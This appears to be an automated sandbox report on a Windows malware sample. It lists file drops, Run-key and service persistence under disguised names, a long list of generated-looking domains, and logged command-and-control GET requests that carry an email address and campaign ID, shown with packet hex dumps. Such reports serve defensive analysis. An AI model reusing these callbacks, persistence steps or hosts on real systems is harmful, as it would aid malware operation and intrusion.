Analysis Date: 2013-09-01 04:56:15
MD5: a25d2a48ac46037adb2894f49c38e593
SHA1: c8e17018785adb256ff75c9f34030e8c1e612a3e

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: 126658499327f39faa6e0165362d312d sha1: 01ddfe47f838ae52122975eba7c400b3e90ce71a size: 735744
Section: .rdata md5: ba437229e6df67383b93f1bf2c81be06 sha1: 3812f08440a87aadad4fc2e50949dba427780dd5 size: 33792
Section: .data md5: 8d9116d9669d60781054e2974e003ca0 sha1: 22e53e35ca90313db5276333856536e1ea02a1d1 size: 122880
Timestamp: 2013-07-10 22:49:49
Packer: Microsoft Visual C++ ?.?
PEhash: 4ad04faf000b15203941f258dfc0d59c4945458b
AV: avg: Generic_r.CMW

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\~DF7BB4.tmp
Creates FileC:\WINDOWS\system32\ompybuiwku\tst
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\fwsnrkx1pg8auuj1icvajg.exe
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\fwsnrkx1pg8auuj1icvajg.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\fwsnrkx1pg8auuj1icvajg.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Windows Reports Discovery Extensible Files ➝ C:\WINDOWS\system32\jufnfeeowpeu.exe
Creates FileC:\WINDOWS\system32\ompybuiwku\lck
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\WINDOWS\system32\ompybuiwku\tst
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\WINDOWS\system32\jufnfeeowpeu.exe
Creates File\Device\Afd\Endpoint
Creates ProcessC:\WINDOWS\system32\jufnfeeowpeu.exe
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Service: Location Remote Publication Files - C:\WINDOWS\system32\jufnfeeowpeu.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 780

Process
↳ Pid 840

Process
↳ C:\WINDOWS\System32\svchost.exe

Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝ NULL
Creates FilePIPE\lsarpc
Creates FileC:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates FileC:\WINDOWS\system32\WBEM\Logs\wbemess.log

Process
↳ Pid 1176

Process
↳ Pid 1352

Process
↳ Pid 1832

Process
↳ Pid 1000

Process
↳ C:\WINDOWS\system32\jufnfeeowpeu.exe

Creates Filepipe\net\NtControlPipe10
Creates FileC:\WINDOWS\system32\zzsajmas.exe
Creates FileC:\WINDOWS\system32\ompybuiwku\lck
Creates FileC:\WINDOWS\system32\ompybuiwku\tst
Creates FileC:\WINDOWS\system32\ompybuiwku\rng
Creates FileC:\WINDOWS\system32\ompybuiwku\cfg
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\system32\ompybuiwku\run
Creates Process: WATCHDOGPROC "c:\windows\system32\jufnfeeowpeu.exe"

Process
↳ C:\WINDOWS\system32\jufnfeeowpeu.exe

Process
↳ WATCHDOGPROC "c:\windows\system32\jufnfeeowpeu.exe"

Network Details:

DNSelementarimagine.com
Type: A
216.239.140.29
DNSthemorrefk.com
Type: A
216.55.149.9
DNSjumpgray.net
Type: A
98.139.135.22
DNSjumpgray.net
Type: A
98.139.135.21
DNSsightguide.net
Type: A
95.143.172.148
DNScaseguide.net
Type: A
141.101.114.20
DNScaseguide.net
Type: A
190.93.245.20
DNScaseguide.net
Type: A
141.101.115.20
DNScaseguide.net
Type: A
190.93.244.20
DNScaseguide.net
Type: A
190.93.246.20
DNSquickname.net
Type: A
64.95.64.190
DNSquickguide.net
Type: A
64.95.64.162
DNSdarkhalf.net
Type: A
173.236.166.37
DNScloudname.net
Type: A
84.49.232.107
DNScloudguide.net
Type: A
216.8.179.30
DNSmilkfish.net
Type: A
98.14.236.145
DNSwithwing.net
Type: A
36.3.112.226
DNSsightfish.net
Type: A
205.178.145.123
DNSheadwing.net
Type: A
199.34.228.100
DNSmojoguia.com
Type: A
DNSpengthecon.com
Type: A
DNStablewash.net
Type: A
DNSsalthave.net
Type: A
DNSyourenjoy.net
Type: A
DNSlookloss.net
Type: A
DNSsouthabout.net
Type: A
DNSliarshot.net
Type: A
DNSableeach.net
Type: A
DNSmovegray.net
Type: A
DNSwithname.net
Type: A
DNSdutyname.net
Type: A
DNSwithguide.net
Type: A
DNSdutyguide.net
Type: A
DNSwithlate.net
Type: A
DNSdutylate.net
Type: A
DNSthesehalf.net
Type: A
DNSsighthalf.net
Type: A
DNSthesename.net
Type: A
DNSsightname.net
Type: A
DNStheseguide.net
Type: A
DNStheselate.net
Type: A
DNSsightlate.net
Type: A
DNScasehalf.net
Type: A
DNSheadhalf.net
Type: A
DNScasename.net
Type: A
DNSheadname.net
Type: A
DNSheadguide.net
Type: A
DNScaselate.net
Type: A
DNSheadlate.net
Type: A
DNSquickhalf.net
Type: A
DNSthenhalf.net
Type: A
DNSthenname.net
Type: A
DNSthenguide.net
Type: A
DNSquicklate.net
Type: A
DNSthenlate.net
Type: A
DNSsundayhalf.net
Type: A
DNSmosthalf.net
Type: A
DNSsundayname.net
Type: A
DNSmostname.net
Type: A
DNSsundayguide.net
Type: A
DNSmostguide.net
Type: A
DNSsundaylate.net
Type: A
DNSmostlate.net
Type: A
DNSmeathalf.net
Type: A
DNSsickhalf.net
Type: A
DNSmeatname.net
Type: A
DNSsickname.net
Type: A
DNSmeatguide.net
Type: A
DNSsickguide.net
Type: A
DNSmeatlate.net
Type: A
DNSsicklate.net
Type: A
DNScloudhalf.net
Type: A
DNSdarkname.net
Type: A
DNSdarkguide.net
Type: A
DNScloudlate.net
Type: A
DNSdarklate.net
Type: A
DNSmilkwing.net
Type: A
DNStriedwing.net
Type: A
DNSmilkpast.net
Type: A
DNStriedpast.net
Type: A
DNSmilklady.net
Type: A
DNStriedlady.net
Type: A
DNStriedfish.net
Type: A
DNSdutywing.net
Type: A
DNSwithpast.net
Type: A
DNSdutypast.net
Type: A
DNSwithlady.net
Type: A
DNSdutylady.net
Type: A
DNSwithfish.net
Type: A
DNSdutyfish.net
Type: A
DNSthesewing.net
Type: A
DNSsightwing.net
Type: A
DNSthesepast.net
Type: A
DNSsightpast.net
Type: A
DNStheselady.net
Type: A
DNSsightlady.net
Type: A
DNSthesefish.net
Type: A
DNScasewing.net
Type: A
DNScasepast.net
Type: A
DNSheadpast.net
Type: A
DNScaselady.net
Type: A
DNSheadlady.net
Type: A
DNScasefish.net
Type: A
HTTP GEThttp://elementarimagine.com/forum/search.php?method=validate&mode=my&email=markescuin@yahoo.com&lici=auto_001174&ver=013
User-Agent:
HTTP GEThttp://themorrefk.com/forum/search.php?method=validate&mode=my&email=markescuin@yahoo.com&lici=auto_001174&ver=013
User-Agent:
HTTP GEThttp://jumpgray.net/forum/search.php?method=validate&mode=my&email=markescuin@yahoo.com&lici=auto_001174&ver=013
User-Agent:
HTTP GEThttp://sightguide.net/forum/search.php?method=validate&mode=my&email=markescuin@yahoo.com&lici=auto_001174&ver=013
User-Agent:
HTTP GEThttp://caseguide.net/forum/search.php?method=validate&mode=my&email=markescuin@yahoo.com&lici=auto_001174&ver=013
User-Agent:
HTTP GEThttp://quickname.net/forum/search.php?method=validate&mode=my&email=markescuin@yahoo.com&lici=auto_001174&ver=013
User-Agent:
HTTP GEThttp://quickguide.net/forum/search.php?method=validate&mode=my&email=markescuin@yahoo.com&lici=auto_001174&ver=013
User-Agent:
HTTP GEThttp://darkhalf.net/forum/search.php?method=validate&mode=my&email=markescuin@yahoo.com&lici=auto_001174&ver=013
User-Agent:
HTTP GEThttp://cloudname.net/forum/search.php?method=validate&mode=my&email=markescuin@yahoo.com&lici=auto_001174&ver=013
User-Agent:
HTTP GEThttp://cloudguide.net/forum/search.php?method=validate&mode=my&email=markescuin@yahoo.com&lici=auto_001174&ver=013
User-Agent:
HTTP GEThttp://milkfish.net/forum/search.php?method=validate&mode=my&email=markescuin@yahoo.com&lici=auto_001174&ver=013
User-Agent:
HTTP GEThttp://withwing.net/forum/search.php?method=validate&mode=my&email=markescuin@yahoo.com&lici=auto_001174&ver=013
User-Agent:
HTTP GEThttp://sightfish.net/forum/search.php?method=validate&mode=my&email=markescuin@yahoo.com&lici=auto_001174&ver=013
User-Agent:
HTTP GEThttp://headwing.net/forum/search.php?method=validate&mode=my&email=markescuin@yahoo.com&lici=auto_001174&ver=013
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 216.239.140.29:80
Flows TCP192.168.1.1:1032 ➝ 216.55.149.9:80
Flows TCP192.168.1.1:1033 ➝ 98.139.135.22:80
Flows TCP192.168.1.1:1034 ➝ 95.143.172.148:80
Flows TCP192.168.1.1:1035 ➝ 141.101.114.20:80
Flows TCP192.168.1.1:1036 ➝ 64.95.64.190:80
Flows TCP192.168.1.1:1037 ➝ 64.95.64.162:80
Flows TCP192.168.1.1:1038 ➝ 173.236.166.37:80
Flows TCP192.168.1.1:1039 ➝ 84.49.232.107:80
Flows TCP192.168.1.1:1040 ➝ 216.8.179.30:80
Flows TCP192.168.1.1:1041 ➝ 98.14.236.145:80
Flows TCP192.168.1.1:1042 ➝ 36.3.112.226:80
Flows TCP192.168.1.1:1043 ➝ 205.178.145.123:80
Flows TCP192.168.1.1:1044 ➝ 199.34.228.100:80

Raw Pcap
0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d6d 7926656d   idate&mode=my&em
0x00000030 (00048)   61696c3d 6d61726b 65736375 696e4079   ail=markescuin@y
0x00000040 (00064)   61686f6f 2e636f6d 266c6963 693d6175   ahoo.com&lici=au
0x00000050 (00080)   746f5f30 30313137 34267665 723d3031   to_001174&ver=01
0x00000060 (00096)   33204854 54502f31 2e300d0a 41636365   3 HTTP/1.0..Acce
0x00000070 (00112)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000080 (00128)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000090 (00144)   3a20656c 656d656e 74617269 6d616769   : elementarimagi
0x000000a0 (00160)   6e652e63 6f6d0d0a 0d0a                ne.com....

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d6d 7926656d   idate&mode=my&em
0x00000030 (00048)   61696c3d 6d61726b 65736375 696e4079   ail=markescuin@y
0x00000040 (00064)   61686f6f 2e636f6d 266c6963 693d6175   ahoo.com&lici=au
0x00000050 (00080)   746f5f30 30313137 34267665 723d3031   to_001174&ver=01
0x00000060 (00096)   33204854 54502f31 2e300d0a 41636365   3 HTTP/1.0..Acce
0x00000070 (00112)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000080 (00128)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000090 (00144)   3a207468 656d6f72 7265666b 2e636f6d   : themorrefk.com
0x000000a0 (00160)   0d0a0d0a 6f6d0d0a 0d0a                ....om....

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d6d 7926656d   idate&mode=my&em
0x00000030 (00048)   61696c3d 6d61726b 65736375 696e4079   ail=markescuin@y
0x00000040 (00064)   61686f6f 2e636f6d 266c6963 693d6175   ahoo.com&lici=au
0x00000050 (00080)   746f5f30 30313137 34267665 723d3031   to_001174&ver=01
0x00000060 (00096)   33204854 54502f31 2e300d0a 41636365   3 HTTP/1.0..Acce
0x00000070 (00112)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000080 (00128)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000090 (00144)   3a206a75 6d706772 61792e6e 65740d0a   : jumpgray.net..
0x000000a0 (00160)   0d0a3034 204e6f74 20466f75 6e643c2f   ..04 Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d6d 7926656d   idate&mode=my&em
0x00000030 (00048)   61696c3d 6d61726b 65736375 696e4079   ail=markescuin@y
0x00000040 (00064)   61686f6f 2e636f6d 266c6963 693d6175   ahoo.com&lici=au
0x00000050 (00080)   746f5f30 30313137 34267665 723d3031   to_001174&ver=01
0x00000060 (00096)   33204854 54502f31 2e300d0a 41636365   3 HTTP/1.0..Acce
0x00000070 (00112)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000080 (00128)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000090 (00144)   3a207369 67687467 75696465 2e6e6574   : sightguide.net
0x000000a0 (00160)   0d0a0d0a 204e6f74 20466f75 6e643c2f   .... Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d6d 7926656d   idate&mode=my&em
0x00000030 (00048)   61696c3d 6d61726b 65736375 696e4079   ail=markescuin@y
0x00000040 (00064)   61686f6f 2e636f6d 266c6963 693d6175   ahoo.com&lici=au
0x00000050 (00080)   746f5f30 30313137 34267665 723d3031   to_001174&ver=01
0x00000060 (00096)   33204854 54502f31 2e300d0a 41636365   3 HTTP/1.0..Acce
0x00000070 (00112)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000080 (00128)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000090 (00144)   3a206361 73656775 6964652e 6e65740d   : caseguide.net.
0x000000a0 (00160)   0a0d0a0a 204e6f74 20466f75 6e643c2f   .... Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d6d 7926656d   idate&mode=my&em
0x00000030 (00048)   61696c3d 6d61726b 65736375 696e4079   ail=markescuin@y
0x00000040 (00064)   61686f6f 2e636f6d 266c6963 693d6175   ahoo.com&lici=au
0x00000050 (00080)   746f5f30 30313137 34267665 723d3031   to_001174&ver=01
0x00000060 (00096)   33204854 54502f31 2e300d0a 41636365   3 HTTP/1.0..Acce
0x00000070 (00112)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000080 (00128)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000090 (00144)   3a207175 69636b6e 616d652e 6e65740d   : quickname.net.
0x000000a0 (00160)   0a0d0a0a 204e6f74 20466f75 6e643c2f   .... Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d6d 7926656d   idate&mode=my&em
0x00000030 (00048)   61696c3d 6d61726b 65736375 696e4079   ail=markescuin@y
0x00000040 (00064)   61686f6f 2e636f6d 266c6963 693d6175   ahoo.com&lici=au
0x00000050 (00080)   746f5f30 30313137 34267665 723d3031   to_001174&ver=01
0x00000060 (00096)   33204854 54502f31 2e300d0a 41636365   3 HTTP/1.0..Acce
0x00000070 (00112)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000080 (00128)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000090 (00144)   3a207175 69636b67 75696465 2e6e6574   : quickguide.net
0x000000a0 (00160)   0d0a0d0a 204e6f74 20466f75 6e643c2f   .... Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d6d 7926656d   idate&mode=my&em
0x00000030 (00048)   61696c3d 6d61726b 65736375 696e4079   ail=markescuin@y
0x00000040 (00064)   61686f6f 2e636f6d 266c6963 693d6175   ahoo.com&lici=au
0x00000050 (00080)   746f5f30 30313137 34267665 723d3031   to_001174&ver=01
0x00000060 (00096)   33204854 54502f31 2e300d0a 41636365   3 HTTP/1.0..Acce
0x00000070 (00112)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000080 (00128)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000090 (00144)   3a206461 726b6861 6c662e6e 65740d0a   : darkhalf.net..
0x000000a0 (00160)   0d0a0d0a 204e6f74 20466f75 6e643c2f   .... Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d6d 7926656d   idate&mode=my&em
0x00000030 (00048)   61696c3d 6d61726b 65736375 696e4079   ail=markescuin@y
0x00000040 (00064)   61686f6f 2e636f6d 266c6963 693d6175   ahoo.com&lici=au
0x00000050 (00080)   746f5f30 30313137 34267665 723d3031   to_001174&ver=01
0x00000060 (00096)   33204854 54502f31 2e300d0a 41636365   3 HTTP/1.0..Acce
0x00000070 (00112)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000080 (00128)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000090 (00144)   3a20636c 6f75646e 616d652e 6e65740d   : cloudname.net.
0x000000a0 (00160)   0a0d0a0a 204e6f74 20466f75 6e643c2f   .... Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d6d 7926656d   idate&mode=my&em
0x00000030 (00048)   61696c3d 6d61726b 65736375 696e4079   ail=markescuin@y
0x00000040 (00064)   61686f6f 2e636f6d 266c6963 693d6175   ahoo.com&lici=au
0x00000050 (00080)   746f5f30 30313137 34267665 723d3031   to_001174&ver=01
0x00000060 (00096)   33204854 54502f31 2e300d0a 41636365   3 HTTP/1.0..Acce
0x00000070 (00112)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000080 (00128)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000090 (00144)   3a20636c 6f756467 75696465 2e6e6574   : cloudguide.net
0x000000a0 (00160)   0d0a0d0a 204e6f74 20466f75 6e643c2f   .... Not Found</
0x000000b0 (00176)   7469746c 653e0a20 203c2f68 6561643e   title>.  </head>
0x000000c0 (00192)   0a20203c 626f6479 3e0a2020 20203c68   .  <body>.    <h
0x000000d0 (00208)   313e4e6f 7420466f 756e643c 2f68313e   1>Not Found</h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d6d 7926656d   idate&mode=my&em
0x00000030 (00048)   61696c3d 6d61726b 65736375 696e4079   ail=markescuin@y
0x00000040 (00064)   61686f6f 2e636f6d 266c6963 693d6175   ahoo.com&lici=au
0x00000050 (00080)   746f5f30 30313137 34267665 723d3031   to_001174&ver=01
0x00000060 (00096)   33204854 54502f31 2e300d0a 41636365   3 HTTP/1.0..Acce
